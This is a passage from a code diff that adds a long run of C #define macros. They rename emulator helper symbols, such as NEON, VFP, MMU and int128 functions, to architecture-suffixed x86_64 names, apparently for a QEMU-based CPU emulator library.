helper_le_ldw_cmmu_x86_64 +#define helper_le_stl_mmu helper_le_stl_mmu_x86_64 +#define helper_le_stq_mmu helper_le_stq_mmu_x86_64 +#define helper_le_stw_mmu helper_le_stw_mmu_x86_64 +#define helper_msr_i_pstate helper_msr_i_pstate_x86_64 +#define helper_neon_abd_f32 helper_neon_abd_f32_x86_64 +#define helper_neon_abdl_s16 helper_neon_abdl_s16_x86_64 +#define helper_neon_abdl_s32 helper_neon_abdl_s32_x86_64 +#define helper_neon_abdl_s64 helper_neon_abdl_s64_x86_64 +#define helper_neon_abdl_u16 helper_neon_abdl_u16_x86_64 +#define helper_neon_abdl_u32 helper_neon_abdl_u32_x86_64 +#define helper_neon_abdl_u64 helper_neon_abdl_u64_x86_64 +#define helper_neon_abd_s16 helper_neon_abd_s16_x86_64 +#define helper_neon_abd_s32 helper_neon_abd_s32_x86_64 +#define helper_neon_abd_s8 helper_neon_abd_s8_x86_64 +#define helper_neon_abd_u16 helper_neon_abd_u16_x86_64 +#define helper_neon_abd_u32 helper_neon_abd_u32_x86_64 +#define helper_neon_abd_u8 helper_neon_abd_u8_x86_64 +#define helper_neon_abs_s16 helper_neon_abs_s16_x86_64 +#define helper_neon_abs_s8 helper_neon_abs_s8_x86_64 +#define helper_neon_acge_f32 helper_neon_acge_f32_x86_64 +#define helper_neon_acge_f64 helper_neon_acge_f64_x86_64 +#define helper_neon_acgt_f32 helper_neon_acgt_f32_x86_64 +#define helper_neon_acgt_f64 helper_neon_acgt_f64_x86_64 +#define helper_neon_addl_saturate_s32 helper_neon_addl_saturate_s32_x86_64 +#define helper_neon_addl_saturate_s64 helper_neon_addl_saturate_s64_x86_64 +#define helper_neon_addl_u16 helper_neon_addl_u16_x86_64 +#define helper_neon_addl_u32 helper_neon_addl_u32_x86_64 +#define helper_neon_add_u16 helper_neon_add_u16_x86_64 +#define helper_neon_add_u8 helper_neon_add_u8_x86_64 +#define helper_neon_ceq_f32 helper_neon_ceq_f32_x86_64 +#define helper_neon_ceq_u16 helper_neon_ceq_u16_x86_64 +#define helper_neon_ceq_u32 helper_neon_ceq_u32_x86_64 +#define helper_neon_ceq_u8 helper_neon_ceq_u8_x86_64 +#define helper_neon_cge_f32 helper_neon_cge_f32_x86_64 +#define 
helper_neon_cge_s16 helper_neon_cge_s16_x86_64 +#define helper_neon_cge_s32 helper_neon_cge_s32_x86_64 +#define helper_neon_cge_s8 helper_neon_cge_s8_x86_64 +#define helper_neon_cge_u16 helper_neon_cge_u16_x86_64 +#define helper_neon_cge_u32 helper_neon_cge_u32_x86_64 +#define helper_neon_cge_u8 helper_neon_cge_u8_x86_64 +#define helper_neon_cgt_f32 helper_neon_cgt_f32_x86_64 +#define helper_neon_cgt_s16 helper_neon_cgt_s16_x86_64 +#define helper_neon_cgt_s32 helper_neon_cgt_s32_x86_64 +#define helper_neon_cgt_s8 helper_neon_cgt_s8_x86_64 +#define helper_neon_cgt_u16 helper_neon_cgt_u16_x86_64 +#define helper_neon_cgt_u32 helper_neon_cgt_u32_x86_64 +#define helper_neon_cgt_u8 helper_neon_cgt_u8_x86_64 +#define helper_neon_cls_s16 helper_neon_cls_s16_x86_64 +#define helper_neon_cls_s32 helper_neon_cls_s32_x86_64 +#define helper_neon_cls_s8 helper_neon_cls_s8_x86_64 +#define helper_neon_clz_u16 helper_neon_clz_u16_x86_64 +#define helper_neon_clz_u8 helper_neon_clz_u8_x86_64 +#define helper_neon_cnt_u8 helper_neon_cnt_u8_x86_64 +#define helper_neon_fcvt_f16_to_f32 helper_neon_fcvt_f16_to_f32_x86_64 +#define helper_neon_fcvt_f32_to_f16 helper_neon_fcvt_f32_to_f16_x86_64 +#define helper_neon_hadd_s16 helper_neon_hadd_s16_x86_64 +#define helper_neon_hadd_s32 helper_neon_hadd_s32_x86_64 +#define helper_neon_hadd_s8 helper_neon_hadd_s8_x86_64 +#define helper_neon_hadd_u16 helper_neon_hadd_u16_x86_64 +#define helper_neon_hadd_u32 helper_neon_hadd_u32_x86_64 +#define helper_neon_hadd_u8 helper_neon_hadd_u8_x86_64 +#define helper_neon_hsub_s16 helper_neon_hsub_s16_x86_64 +#define helper_neon_hsub_s32 helper_neon_hsub_s32_x86_64 +#define helper_neon_hsub_s8 helper_neon_hsub_s8_x86_64 +#define helper_neon_hsub_u16 helper_neon_hsub_u16_x86_64 +#define helper_neon_hsub_u32 helper_neon_hsub_u32_x86_64 +#define helper_neon_hsub_u8 helper_neon_hsub_u8_x86_64 +#define helper_neon_max_s16 helper_neon_max_s16_x86_64 +#define helper_neon_max_s32 helper_neon_max_s32_x86_64 +#define 
helper_neon_max_s8 helper_neon_max_s8_x86_64 +#define helper_neon_max_u16 helper_neon_max_u16_x86_64 +#define helper_neon_max_u32 helper_neon_max_u32_x86_64 +#define helper_neon_max_u8 helper_neon_max_u8_x86_64 +#define helper_neon_min_s16 helper_neon_min_s16_x86_64 +#define helper_neon_min_s32 helper_neon_min_s32_x86_64 +#define helper_neon_min_s8 helper_neon_min_s8_x86_64 +#define helper_neon_min_u16 helper_neon_min_u16_x86_64 +#define helper_neon_min_u32 helper_neon_min_u32_x86_64 +#define helper_neon_min_u8 helper_neon_min_u8_x86_64 +#define helper_neon_mull_p8 helper_neon_mull_p8_x86_64 +#define helper_neon_mull_s16 helper_neon_mull_s16_x86_64 +#define helper_neon_mull_s8 helper_neon_mull_s8_x86_64 +#define helper_neon_mull_u16 helper_neon_mull_u16_x86_64 +#define helper_neon_mull_u8 helper_neon_mull_u8_x86_64 +#define helper_neon_mul_p8 helper_neon_mul_p8_x86_64 +#define helper_neon_mul_u16 helper_neon_mul_u16_x86_64 +#define helper_neon_mul_u8 helper_neon_mul_u8_x86_64 +#define helper_neon_narrow_high_u16 helper_neon_narrow_high_u16_x86_64 +#define helper_neon_narrow_high_u8 helper_neon_narrow_high_u8_x86_64 +#define helper_neon_narrow_round_high_u16 helper_neon_narrow_round_high_u16_x86_64 +#define helper_neon_narrow_round_high_u8 helper_neon_narrow_round_high_u8_x86_64 +#define helper_neon_narrow_sat_s16 helper_neon_narrow_sat_s16_x86_64 +#define helper_neon_narrow_sat_s32 helper_neon_narrow_sat_s32_x86_64 +#define helper_neon_narrow_sat_s8 helper_neon_narrow_sat_s8_x86_64 +#define helper_neon_narrow_sat_u16 helper_neon_narrow_sat_u16_x86_64 +#define helper_neon_narrow_sat_u32 helper_neon_narrow_sat_u32_x86_64 +#define helper_neon_narrow_sat_u8 helper_neon_narrow_sat_u8_x86_64 +#define helper_neon_narrow_u16 helper_neon_narrow_u16_x86_64 +#define helper_neon_narrow_u8 helper_neon_narrow_u8_x86_64 +#define helper_neon_negl_u16 helper_neon_negl_u16_x86_64 +#define helper_neon_negl_u32 helper_neon_negl_u32_x86_64 +#define helper_neon_paddl_u16 
helper_neon_paddl_u16_x86_64 +#define helper_neon_paddl_u32 helper_neon_paddl_u32_x86_64 +#define helper_neon_padd_u16 helper_neon_padd_u16_x86_64 +#define helper_neon_padd_u8 helper_neon_padd_u8_x86_64 +#define helper_neon_pmax_s16 helper_neon_pmax_s16_x86_64 +#define helper_neon_pmax_s8 helper_neon_pmax_s8_x86_64 +#define helper_neon_pmax_u16 helper_neon_pmax_u16_x86_64 +#define helper_neon_pmax_u8 helper_neon_pmax_u8_x86_64 +#define helper_neon_pmin_s16 helper_neon_pmin_s16_x86_64 +#define helper_neon_pmin_s8 helper_neon_pmin_s8_x86_64 +#define helper_neon_pmin_u16 helper_neon_pmin_u16_x86_64 +#define helper_neon_pmin_u8 helper_neon_pmin_u8_x86_64 +#define helper_neon_pmull_64_hi helper_neon_pmull_64_hi_x86_64 +#define helper_neon_pmull_64_lo helper_neon_pmull_64_lo_x86_64 +#define helper_neon_qabs_s16 helper_neon_qabs_s16_x86_64 +#define helper_neon_qabs_s32 helper_neon_qabs_s32_x86_64 +#define helper_neon_qabs_s64 helper_neon_qabs_s64_x86_64 +#define helper_neon_qabs_s8 helper_neon_qabs_s8_x86_64 +#define helper_neon_qadd_s16 helper_neon_qadd_s16_x86_64 +#define helper_neon_qadd_s32 helper_neon_qadd_s32_x86_64 +#define helper_neon_qadd_s64 helper_neon_qadd_s64_x86_64 +#define helper_neon_qadd_s8 helper_neon_qadd_s8_x86_64 +#define helper_neon_qadd_u16 helper_neon_qadd_u16_x86_64 +#define helper_neon_qadd_u32 helper_neon_qadd_u32_x86_64 +#define helper_neon_qadd_u64 helper_neon_qadd_u64_x86_64 +#define helper_neon_qadd_u8 helper_neon_qadd_u8_x86_64 +#define helper_neon_qdmulh_s16 helper_neon_qdmulh_s16_x86_64 +#define helper_neon_qdmulh_s32 helper_neon_qdmulh_s32_x86_64 +#define helper_neon_qneg_s16 helper_neon_qneg_s16_x86_64 +#define helper_neon_qneg_s32 helper_neon_qneg_s32_x86_64 +#define helper_neon_qneg_s64 helper_neon_qneg_s64_x86_64 +#define helper_neon_qneg_s8 helper_neon_qneg_s8_x86_64 +#define helper_neon_qrdmulh_s16 helper_neon_qrdmulh_s16_x86_64 +#define helper_neon_qrdmulh_s32 helper_neon_qrdmulh_s32_x86_64 +#define helper_neon_qrshl_s16 
helper_neon_qrshl_s16_x86_64 +#define helper_neon_qrshl_s32 helper_neon_qrshl_s32_x86_64 +#define helper_neon_qrshl_s64 helper_neon_qrshl_s64_x86_64 +#define helper_neon_qrshl_s8 helper_neon_qrshl_s8_x86_64 +#define helper_neon_qrshl_u16 helper_neon_qrshl_u16_x86_64 +#define helper_neon_qrshl_u32 helper_neon_qrshl_u32_x86_64 +#define helper_neon_qrshl_u64 helper_neon_qrshl_u64_x86_64 +#define helper_neon_qrshl_u8 helper_neon_qrshl_u8_x86_64 +#define helper_neon_qshl_s16 helper_neon_qshl_s16_x86_64 +#define helper_neon_qshl_s32 helper_neon_qshl_s32_x86_64 +#define helper_neon_qshl_s64 helper_neon_qshl_s64_x86_64 +#define helper_neon_qshl_s8 helper_neon_qshl_s8_x86_64 +#define helper_neon_qshl_u16 helper_neon_qshl_u16_x86_64 +#define helper_neon_qshl_u32 helper_neon_qshl_u32_x86_64 +#define helper_neon_qshl_u64 helper_neon_qshl_u64_x86_64 +#define helper_neon_qshl_u8 helper_neon_qshl_u8_x86_64 +#define helper_neon_qshlu_s16 helper_neon_qshlu_s16_x86_64 +#define helper_neon_qshlu_s32 helper_neon_qshlu_s32_x86_64 +#define helper_neon_qshlu_s64 helper_neon_qshlu_s64_x86_64 +#define helper_neon_qshlu_s8 helper_neon_qshlu_s8_x86_64 +#define helper_neon_qsub_s16 helper_neon_qsub_s16_x86_64 +#define helper_neon_qsub_s32 helper_neon_qsub_s32_x86_64 +#define helper_neon_qsub_s64 helper_neon_qsub_s64_x86_64 +#define helper_neon_qsub_s8 helper_neon_qsub_s8_x86_64 +#define helper_neon_qsub_u16 helper_neon_qsub_u16_x86_64 +#define helper_neon_qsub_u32 helper_neon_qsub_u32_x86_64 +#define helper_neon_qsub_u64 helper_neon_qsub_u64_x86_64 +#define helper_neon_qsub_u8 helper_neon_qsub_u8_x86_64 +#define helper_neon_qunzip16 helper_neon_qunzip16_x86_64 +#define helper_neon_qunzip32 helper_neon_qunzip32_x86_64 +#define helper_neon_qunzip8 helper_neon_qunzip8_x86_64 +#define helper_neon_qzip16 helper_neon_qzip16_x86_64 +#define helper_neon_qzip32 helper_neon_qzip32_x86_64 +#define helper_neon_qzip8 helper_neon_qzip8_x86_64 +#define helper_neon_rbit_u8 helper_neon_rbit_u8_x86_64 +#define 
helper_neon_rhadd_s16 helper_neon_rhadd_s16_x86_64 +#define helper_neon_rhadd_s32 helper_neon_rhadd_s32_x86_64 +#define helper_neon_rhadd_s8 helper_neon_rhadd_s8_x86_64 +#define helper_neon_rhadd_u16 helper_neon_rhadd_u16_x86_64 +#define helper_neon_rhadd_u32 helper_neon_rhadd_u32_x86_64 +#define helper_neon_rhadd_u8 helper_neon_rhadd_u8_x86_64 +#define helper_neon_rshl_s16 helper_neon_rshl_s16_x86_64 +#define helper_neon_rshl_s32 helper_neon_rshl_s32_x86_64 +#define helper_neon_rshl_s64 helper_neon_rshl_s64_x86_64 +#define helper_neon_rshl_s8 helper_neon_rshl_s8_x86_64 +#define helper_neon_rshl_u16 helper_neon_rshl_u16_x86_64 +#define helper_neon_rshl_u32 helper_neon_rshl_u32_x86_64 +#define helper_neon_rshl_u64 helper_neon_rshl_u64_x86_64 +#define helper_neon_rshl_u8 helper_neon_rshl_u8_x86_64 +#define helper_neon_shl_s16 helper_neon_shl_s16_x86_64 +#define helper_neon_shl_s32 helper_neon_shl_s32_x86_64 +#define helper_neon_shl_s64 helper_neon_shl_s64_x86_64 +#define helper_neon_shl_s8 helper_neon_shl_s8_x86_64 +#define helper_neon_shl_u16 helper_neon_shl_u16_x86_64 +#define helper_neon_shl_u32 helper_neon_shl_u32_x86_64 +#define helper_neon_shl_u64 helper_neon_shl_u64_x86_64 +#define helper_neon_shl_u8 helper_neon_shl_u8_x86_64 +#define helper_neon_sqadd_u16 helper_neon_sqadd_u16_x86_64 +#define helper_neon_sqadd_u32 helper_neon_sqadd_u32_x86_64 +#define helper_neon_sqadd_u64 helper_neon_sqadd_u64_x86_64 +#define helper_neon_sqadd_u8 helper_neon_sqadd_u8_x86_64 +#define helper_neon_subl_u16 helper_neon_subl_u16_x86_64 +#define helper_neon_subl_u32 helper_neon_subl_u32_x86_64 +#define helper_neon_sub_u16 helper_neon_sub_u16_x86_64 +#define helper_neon_sub_u8 helper_neon_sub_u8_x86_64 +#define helper_neon_tbl helper_neon_tbl_x86_64 +#define helper_neon_tst_u16 helper_neon_tst_u16_x86_64 +#define helper_neon_tst_u32 helper_neon_tst_u32_x86_64 +#define helper_neon_tst_u8 helper_neon_tst_u8_x86_64 +#define helper_neon_unarrow_sat16 helper_neon_unarrow_sat16_x86_64 
+#define helper_neon_unarrow_sat32 helper_neon_unarrow_sat32_x86_64 +#define helper_neon_unarrow_sat8 helper_neon_unarrow_sat8_x86_64 +#define helper_neon_unzip16 helper_neon_unzip16_x86_64 +#define helper_neon_unzip8 helper_neon_unzip8_x86_64 +#define helper_neon_uqadd_s16 helper_neon_uqadd_s16_x86_64 +#define helper_neon_uqadd_s32 helper_neon_uqadd_s32_x86_64 +#define helper_neon_uqadd_s64 helper_neon_uqadd_s64_x86_64 +#define helper_neon_uqadd_s8 helper_neon_uqadd_s8_x86_64 +#define helper_neon_widen_s16 helper_neon_widen_s16_x86_64 +#define helper_neon_widen_s8 helper_neon_widen_s8_x86_64 +#define helper_neon_widen_u16 helper_neon_widen_u16_x86_64 +#define helper_neon_widen_u8 helper_neon_widen_u8_x86_64 +#define helper_neon_zip16 helper_neon_zip16_x86_64 +#define helper_neon_zip8 helper_neon_zip8_x86_64 +#define helper_pre_hvc helper_pre_hvc_x86_64 +#define helper_pre_smc helper_pre_smc_x86_64 +#define helper_qadd16 helper_qadd16_x86_64 +#define helper_qadd8 helper_qadd8_x86_64 +#define helper_qaddsubx helper_qaddsubx_x86_64 +#define helper_qsub16 helper_qsub16_x86_64 +#define helper_qsub8 helper_qsub8_x86_64 +#define helper_qsubaddx helper_qsubaddx_x86_64 +#define helper_rbit helper_rbit_x86_64 +#define helper_recpe_f32 helper_recpe_f32_x86_64 +#define helper_recpe_f64 helper_recpe_f64_x86_64 +#define helper_recpe_u32 helper_recpe_u32_x86_64 +#define helper_recps_f32 helper_recps_f32_x86_64 +#define helper_ret_ldb_cmmu helper_ret_ldb_cmmu_x86_64 +#define helper_ret_ldsb_mmu helper_ret_ldsb_mmu_x86_64 +#define helper_ret_ldub_mmu helper_ret_ldub_mmu_x86_64 +#define helper_ret_stb_mmu helper_ret_stb_mmu_x86_64 +#define helper_rintd helper_rintd_x86_64 +#define helper_rintd_exact helper_rintd_exact_x86_64 +#define helper_rints helper_rints_x86_64 +#define helper_rints_exact helper_rints_exact_x86_64 +#define helper_ror_cc helper_ror_cc_x86_64 +#define helper_rsqrte_f32 helper_rsqrte_f32_x86_64 +#define helper_rsqrte_f64 helper_rsqrte_f64_x86_64 +#define 
helper_rsqrte_u32 helper_rsqrte_u32_x86_64 +#define helper_rsqrts_f32 helper_rsqrts_f32_x86_64 +#define helper_sadd16 helper_sadd16_x86_64 +#define helper_sadd8 helper_sadd8_x86_64 +#define helper_saddsubx helper_saddsubx_x86_64 +#define helper_sar_cc helper_sar_cc_x86_64 +#define helper_sdiv helper_sdiv_x86_64 +#define helper_sel_flags helper_sel_flags_x86_64 +#define helper_set_cp_reg helper_set_cp_reg_x86_64 +#define helper_set_cp_reg64 helper_set_cp_reg64_x86_64 +#define helper_set_neon_rmode helper_set_neon_rmode_x86_64 +#define helper_set_r13_banked helper_set_r13_banked_x86_64 +#define helper_set_rmode helper_set_rmode_x86_64 +#define helper_set_user_reg helper_set_user_reg_x86_64 +#define helper_shadd16 helper_shadd16_x86_64 +#define helper_shadd8 helper_shadd8_x86_64 +#define helper_shaddsubx helper_shaddsubx_x86_64 +#define helper_shl_cc helper_shl_cc_x86_64 +#define helper_shr_cc helper_shr_cc_x86_64 +#define helper_shsub16 helper_shsub16_x86_64 +#define helper_shsub8 helper_shsub8_x86_64 +#define helper_shsubaddx helper_shsubaddx_x86_64 +#define helper_ssat helper_ssat_x86_64 +#define helper_ssat16 helper_ssat16_x86_64 +#define helper_ssub16 helper_ssub16_x86_64 +#define helper_ssub8 helper_ssub8_x86_64 +#define helper_ssubaddx helper_ssubaddx_x86_64 +#define helper_stb_mmu helper_stb_mmu_x86_64 +#define helper_stl_mmu helper_stl_mmu_x86_64 +#define helper_stq_mmu helper_stq_mmu_x86_64 +#define helper_stw_mmu helper_stw_mmu_x86_64 +#define helper_sub_saturate helper_sub_saturate_x86_64 +#define helper_sub_usaturate helper_sub_usaturate_x86_64 +#define helper_sxtb16 helper_sxtb16_x86_64 +#define helper_uadd16 helper_uadd16_x86_64 +#define helper_uadd8 helper_uadd8_x86_64 +#define helper_uaddsubx helper_uaddsubx_x86_64 +#define helper_udiv helper_udiv_x86_64 +#define helper_uhadd16 helper_uhadd16_x86_64 +#define helper_uhadd8 helper_uhadd8_x86_64 +#define helper_uhaddsubx helper_uhaddsubx_x86_64 +#define helper_uhsub16 helper_uhsub16_x86_64 +#define 
helper_uhsub8 helper_uhsub8_x86_64 +#define helper_uhsubaddx helper_uhsubaddx_x86_64 +#define helper_uqadd16 helper_uqadd16_x86_64 +#define helper_uqadd8 helper_uqadd8_x86_64 +#define helper_uqaddsubx helper_uqaddsubx_x86_64 +#define helper_uqsub16 helper_uqsub16_x86_64 +#define helper_uqsub8 helper_uqsub8_x86_64 +#define helper_uqsubaddx helper_uqsubaddx_x86_64 +#define helper_usad8 helper_usad8_x86_64 +#define helper_usat helper_usat_x86_64 +#define helper_usat16 helper_usat16_x86_64 +#define helper_usub16 helper_usub16_x86_64 +#define helper_usub8 helper_usub8_x86_64 +#define helper_usubaddx helper_usubaddx_x86_64 +#define helper_uxtb16 helper_uxtb16_x86_64 +#define helper_v7m_mrs helper_v7m_mrs_x86_64 +#define helper_v7m_msr helper_v7m_msr_x86_64 +#define helper_vfp_absd helper_vfp_absd_x86_64 +#define helper_vfp_abss helper_vfp_abss_x86_64 +#define helper_vfp_addd helper_vfp_addd_x86_64 +#define helper_vfp_adds helper_vfp_adds_x86_64 +#define helper_vfp_cmpd helper_vfp_cmpd_x86_64 +#define helper_vfp_cmped helper_vfp_cmped_x86_64 +#define helper_vfp_cmpes helper_vfp_cmpes_x86_64 +#define helper_vfp_cmps helper_vfp_cmps_x86_64 +#define helper_vfp_divd helper_vfp_divd_x86_64 +#define helper_vfp_divs helper_vfp_divs_x86_64 +#define helper_vfp_fcvtds helper_vfp_fcvtds_x86_64 +#define helper_vfp_fcvt_f16_to_f32 helper_vfp_fcvt_f16_to_f32_x86_64 +#define helper_vfp_fcvt_f16_to_f64 helper_vfp_fcvt_f16_to_f64_x86_64 +#define helper_vfp_fcvt_f32_to_f16 helper_vfp_fcvt_f32_to_f16_x86_64 +#define helper_vfp_fcvt_f64_to_f16 helper_vfp_fcvt_f64_to_f16_x86_64 +#define helper_vfp_fcvtsd helper_vfp_fcvtsd_x86_64 +#define helper_vfp_get_fpscr helper_vfp_get_fpscr_x86_64 +#define helper_vfp_maxd helper_vfp_maxd_x86_64 +#define helper_vfp_maxnumd helper_vfp_maxnumd_x86_64 +#define helper_vfp_maxnums helper_vfp_maxnums_x86_64 +#define helper_vfp_maxs helper_vfp_maxs_x86_64 +#define helper_vfp_mind helper_vfp_mind_x86_64 +#define helper_vfp_minnumd helper_vfp_minnumd_x86_64 
+#define helper_vfp_minnums helper_vfp_minnums_x86_64 +#define helper_vfp_mins helper_vfp_mins_x86_64 +#define helper_vfp_muladdd helper_vfp_muladdd_x86_64 +#define helper_vfp_muladds helper_vfp_muladds_x86_64 +#define helper_vfp_muld helper_vfp_muld_x86_64 +#define helper_vfp_muls helper_vfp_muls_x86_64 +#define helper_vfp_negd helper_vfp_negd_x86_64 +#define helper_vfp_negs helper_vfp_negs_x86_64 +#define helper_vfp_set_fpscr helper_vfp_set_fpscr_x86_64 +#define helper_vfp_shtod helper_vfp_shtod_x86_64 +#define helper_vfp_shtos helper_vfp_shtos_x86_64 +#define helper_vfp_sitod helper_vfp_sitod_x86_64 +#define helper_vfp_sitos helper_vfp_sitos_x86_64 +#define helper_vfp_sltod helper_vfp_sltod_x86_64 +#define helper_vfp_sltos helper_vfp_sltos_x86_64 +#define helper_vfp_sqrtd helper_vfp_sqrtd_x86_64 +#define helper_vfp_sqrts helper_vfp_sqrts_x86_64 +#define helper_vfp_sqtod helper_vfp_sqtod_x86_64 +#define helper_vfp_sqtos helper_vfp_sqtos_x86_64 +#define helper_vfp_subd helper_vfp_subd_x86_64 +#define helper_vfp_subs helper_vfp_subs_x86_64 +#define helper_vfp_toshd helper_vfp_toshd_x86_64 +#define helper_vfp_toshd_round_to_zero helper_vfp_toshd_round_to_zero_x86_64 +#define helper_vfp_toshs helper_vfp_toshs_x86_64 +#define helper_vfp_toshs_round_to_zero helper_vfp_toshs_round_to_zero_x86_64 +#define helper_vfp_tosid helper_vfp_tosid_x86_64 +#define helper_vfp_tosis helper_vfp_tosis_x86_64 +#define helper_vfp_tosizd helper_vfp_tosizd_x86_64 +#define helper_vfp_tosizs helper_vfp_tosizs_x86_64 +#define helper_vfp_tosld helper_vfp_tosld_x86_64 +#define helper_vfp_tosld_round_to_zero helper_vfp_tosld_round_to_zero_x86_64 +#define helper_vfp_tosls helper_vfp_tosls_x86_64 +#define helper_vfp_tosls_round_to_zero helper_vfp_tosls_round_to_zero_x86_64 +#define helper_vfp_tosqd helper_vfp_tosqd_x86_64 +#define helper_vfp_tosqs helper_vfp_tosqs_x86_64 +#define helper_vfp_touhd helper_vfp_touhd_x86_64 +#define helper_vfp_touhd_round_to_zero helper_vfp_touhd_round_to_zero_x86_64 
+#define helper_vfp_touhs helper_vfp_touhs_x86_64 +#define helper_vfp_touhs_round_to_zero helper_vfp_touhs_round_to_zero_x86_64 +#define helper_vfp_touid helper_vfp_touid_x86_64 +#define helper_vfp_touis helper_vfp_touis_x86_64 +#define helper_vfp_touizd helper_vfp_touizd_x86_64 +#define helper_vfp_touizs helper_vfp_touizs_x86_64 +#define helper_vfp_tould helper_vfp_tould_x86_64 +#define helper_vfp_tould_round_to_zero helper_vfp_tould_round_to_zero_x86_64 +#define helper_vfp_touls helper_vfp_touls_x86_64 +#define helper_vfp_touls_round_to_zero helper_vfp_touls_round_to_zero_x86_64 +#define helper_vfp_touqd helper_vfp_touqd_x86_64 +#define helper_vfp_touqs helper_vfp_touqs_x86_64 +#define helper_vfp_uhtod helper_vfp_uhtod_x86_64 +#define helper_vfp_uhtos helper_vfp_uhtos_x86_64 +#define helper_vfp_uitod helper_vfp_uitod_x86_64 +#define helper_vfp_uitos helper_vfp_uitos_x86_64 +#define helper_vfp_ultod helper_vfp_ultod_x86_64 +#define helper_vfp_ultos helper_vfp_ultos_x86_64 +#define helper_vfp_uqtod helper_vfp_uqtod_x86_64 +#define helper_vfp_uqtos helper_vfp_uqtos_x86_64 +#define helper_wfe helper_wfe_x86_64 +#define helper_wfi helper_wfi_x86_64 +#define hex2decimal hex2decimal_x86_64 +#define hw_breakpoint_update hw_breakpoint_update_x86_64 +#define hw_breakpoint_update_all hw_breakpoint_update_all_x86_64 +#define hw_watchpoint_update hw_watchpoint_update_x86_64 +#define hw_watchpoint_update_all hw_watchpoint_update_all_x86_64 +#define _init _init_x86_64 +#define init_cpreg_list init_cpreg_list_x86_64 +#define init_lists init_lists_x86_64 +#define input_type_enum input_type_enum_x86_64 +#define int128_2_64 int128_2_64_x86_64 +#define int128_add int128_add_x86_64 +#define int128_addto int128_addto_x86_64 +#define int128_and int128_and_x86_64 +#define int128_eq int128_eq_x86_64 +#define int128_ge int128_ge_x86_64 +#define int128_get64 int128_get64_x86_64 +#define int128_gt int128_gt_x86_64 +#define int128_le int128_le_x86_64 +#define int128_lt int128_lt_x86_64 
+#define int128_make64 int128_make64_x86_64 +#define int128_max int128_max_x86_64 +#define int128_min int128_min_x86_64 +#define int128_ne int128_ne_x86_64 +#define int128_neg int128_neg_x86_64 +#define int128_nz int128_nz_x86_64 +#define int128_rshift int128_rshift_x86_64 +#define int128_sub int128_sub_x86_64 +#define int128_subfrom int128_subfrom_x86_64 +#define int128_zero int128_zero_x86_64 +#define int16_to_float32 int16_to_float32_x86_64 +#define int16_to_float64 int16_to_float64_x86_64 +#define int32_to_float128 int32_to_float128_x86_64 +#define int32_to_float32 int32_to_float32_x86_64 +#define int32_to_float64 int32_to_float64_x86_64 +#define int32_to_floatx80 int32_to_floatx80_x86_64 +#define int64_to_float128 int64_to_float128_x86_64 +#define int64_to_float32 int64_to_float32_x86_64 +#define int64_to_float64 int64_to_float64_x86_64 +#define int64_to_floatx80 int64_to_floatx80_x86_64 +#define invalidate_and_set_dirty invalidate_and_set_dirty_x86_64 +#define invalidate_page_bitmap invalidate_page_bitmap_x86_64 +#define io_mem_read io_mem_read_x86_64 +#define io_mem_write io_mem_write_x86_64 +#define io_readb io_readb_x86_64 +#define io_readl io_readl_x86_64 +#define io_readq io_readq_x86_64 +#define io_readw io_readw_x86_64 +#define iotlb_to_region iotlb_to_region_x86_64 +#define io_writeb io_writeb_x86_64 +#define io_writel io_writel_x86_64 +#define io_writeq io_writeq_x86_64 +#define io_writew io_writew_x86_64 +#define is_a64 is_a64_x86_64 +#define is_help_option is_help_option_x86_64 +#define isr_read isr_read_x86_64 +#define is_valid_option_list is_valid_option_list_x86_64 +#define iwmmxt_load_creg iwmmxt_load_creg_x86_64 +#define iwmmxt_load_reg iwmmxt_load_reg_x86_64 +#define iwmmxt_store_creg iwmmxt_store_creg_x86_64 +#define iwmmxt_store_reg iwmmxt_store_reg_x86_64 +#define __jit_debug_descriptor __jit_debug_descriptor_x86_64 +#define __jit_debug_register_code __jit_debug_register_code_x86_64 +#define kvm_to_cpreg_id kvm_to_cpreg_id_x86_64 +#define 
last_ram_offset last_ram_offset_x86_64 +#define ldl_be_p ldl_be_p_x86_64 +#define ldl_be_phys ldl_be_phys_x86_64 +#define ldl_he_p ldl_he_p_x86_64 +#define ldl_le_p ldl_le_p_x86_64 +#define ldl_le_phys ldl_le_phys_x86_64 +#define ldl_phys ldl_phys_x86_64 +#define ldl_phys_internal ldl_phys_internal_x86_64 +#define ldq_be_p ldq_be_p_x86_64 +#define ldq_be_phys ldq_be_phys_x86_64 +#define ldq_he_p ldq_he_p_x86_64 +#define ldq_le_p ldq_le_p_x86_64 +#define ldq_le_phys ldq_le_phys_x86_64 +#define ldq_phys ldq_phys_x86_64 +#define ldq_phys_internal ldq_phys_internal_x86_64 +#define ldst_name ldst_name_x86_64 +#define ldub_p ldub_p_x86_64 +#define ldub_phys ldub_phys_x86_64 +#define lduw_be_p lduw_be_p_x86_64 +#define lduw_be_phys lduw_be_phys_x86_64 +#define lduw_he_p lduw_he_p_x86_64 +#define lduw_le_p lduw_le_p_x86_64 +#define lduw_le_phys lduw_le_phys_x86_64 +#define lduw_phys lduw_phys_x86_64 +#define lduw_phys_internal lduw_phys_internal_x86_64 +#define le128 le128_x86_64 +#define linked_bp_matches linked_bp_matches_x86_64 +#define listener_add_address_space listener_add_address_space_x86_64 +#define load_cpu_offset load_cpu_offset_x86_64 +#define load_reg load_reg_x86_64 +#define load_reg_var load_reg_var_x86_64 +#define log_cpu_state log_cpu_state_x86_64 +#define lpae_cp_reginfo lpae_cp_reginfo_x86_64 +#define lt128 lt128_x86_64 +#define machine_class_init machine_class_init_x86_64 +#define machine_finalize machine_finalize_x86_64 +#define machine_info machine_info_x86_64 +#define machine_initfn machine_initfn_x86_64 +#define machine_register_types machine_register_types_x86_64 +#define machvirt_init machvirt_init_x86_64 +#define machvirt_machine_init machvirt_machine_init_x86_64 +#define maj maj_x86_64 +#define mapping_conflict mapping_conflict_x86_64 +#define mapping_contiguous mapping_contiguous_x86_64 +#define mapping_have_same_region mapping_have_same_region_x86_64 +#define mapping_merge mapping_merge_x86_64 +#define mem_add mem_add_x86_64 +#define mem_begin 
